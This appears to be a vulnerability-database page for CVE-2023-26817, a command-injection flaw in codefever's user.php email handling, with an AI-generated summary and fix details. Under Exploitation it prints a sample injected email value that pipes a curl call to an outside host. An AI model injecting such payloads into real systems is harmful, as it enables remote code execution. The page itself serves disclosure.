CVE-2023-26817
Description
codefever before 2023.2.7-commit-b1c2e7f was discovered to contain a remote code execution (RCE) vulnerability via the component /controllers/api/user.php.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Codefever before 2023.2.7-commit-b1c2e7f contains a remote code execution vulnerability in the user.php API endpoint via email parameter injection.
Vulnerability
The vulnerability resides in /application/controllers/api/user.php and /application/libraries/service/Network/Request.php. The $email parameter returned by Request::parse() is passed to EmailSender::send() without proper sanitization. The regular expression meant to validate the address is flawed (the dot is not escaped with a backslash, so it matches any character rather than a literal "."), so shell metacharacters in the value are not rejected and arbitrary commands can be injected. Affected versions: all before commit b1c2e7f (2023.2.7). [1]
Exploitation
An attacker must register and log in to the application. Then, by sending a crafted email parameter (e.g., youyou@qq.com'xx|curl test.server.com;xx'xx) to the user.php endpoint, the injected command is executed via the exec function. [1]
Impact
Successful exploitation allows remote code execution with the privileges of the web server, enabling the attacker to run arbitrary system commands. [1]
Mitigation
The issue is fixed in commit b1c2e7f (version 2023.2.7). Users should upgrade to that version or later. No workaround is provided in the reference. [1]
AI Insight generated on May 25, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- codefever/codefever
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
News mentions
No linked articles in our index yet.